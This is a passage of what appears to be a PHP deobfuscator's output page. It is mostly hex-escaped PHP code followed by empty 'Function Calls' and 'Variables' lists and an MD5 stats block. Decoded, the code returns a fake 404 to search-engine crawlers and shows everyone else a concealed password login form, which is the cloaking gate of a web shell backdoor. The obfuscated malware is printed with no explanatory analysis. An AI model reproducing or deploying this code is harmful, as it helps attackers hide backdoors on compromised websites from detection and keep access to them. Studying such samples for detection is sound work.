(!empty($_SERVER["\110\124\x54\120\137\x55\x53\x45\122\x5f\x41\x47\105\x4e\124"])) { $userAgents = array("\x47\157\157\x67\x6c\145", "\x53\x6c\x75\x72\160", "\x4d\123\116\x42\157\x74", "\x69\x61\x5f\x61\162\x63\x68\151\x76\145\x72", "\131\141\x6e\x64\145\x78", "\122\141\155\x62\x6c\145\x72"); if (preg_match("\57" . implode("\174", $userAgents) . "\x2f\151", $_SERVER["\x48\124\124\x50\x5f\125\123\105\x52\137\101\x47\x45\116\x54"])) { header("\x48\x54\x54\120\57\x31\x2e\x30\x20\x34\60\64\40\116\x6f\x74\x20\x46\157\165\x6e\x64"); die; } } die("\x3c\x70\x72\145\40\141\154\151\x67\x6e\x3d\x63\x65\156\x74\145\162\x3e\x3c\x66\157\x72\x6d\40\x6d\145\x74\x68\x6f\144\x3d\160\157\x73\x74\x3e\x50\141\163\163\x77\x6f\162\144\x3c\x62\x72\76\x3c\x69\x6e\160\165\x74\40\164\x79\x70\145\x3d\x70\x61\163\x73\x77\157\162\x64\x20\156\x61\x6d\x65\x3d\x70\141\163\163\40\163\164\171\x6c\x65\75\x27\x62\x61\143\x6b\147\x72\157\165\156\144\x2d\143\x6f\154\x6f\x72\x3a\x77\x68\x69\164\x65\x73\155\157\153\145\x3b\142\157\x72\144\x65\162\x3a\61\x70\170\x20\163\157\154\x69\x64\x20\x23\x46\x46\106\x3b\157\165\164\154\151\156\x65\72\x6e\x6f\x6e\145\x3b\x27\40\162\145\x71\x75\x69\x72\145\144\x3e\74\x69\156\160\165\x74\x20\164\171\160\x65\x3d\x73\165\142\155\x69\164\x20\x6e\x61\x6d\145\x3d\x27\167\141\x74\x63\x68\x69\156\147\47\x20\x76\141\x6c\165\x65\x3d\47\114\x6f\x67\151\x6e\x27\40\163\x74\171\154\x65\x3d\47\x62\157\162\144\145\162\72\x6e\157\156\145\x3b\x62\141\x63\x6b\x67\x72\x6f\x75\156\144\x2d\x63\157\x6c\x6f\x72\72\x20\x23\x66\x66\x30\x30\60\60\73\x63\157\x6c\x6f\x72\x3a\43\x66\146\x66\x3b\143\165\x72\163\x6f\x72\72\160\157\x69\156\x74\145\x72\73\x27\x3e\x3c\x2f\146\157\162\155\x3e\74\57\160\x72\x65\x3e"); } 

Function Calls

None

Variables

None

Stats

MD5 13837c1821493814e9d416b49c9376b3
Eval Count 0
Decode Time 148 ms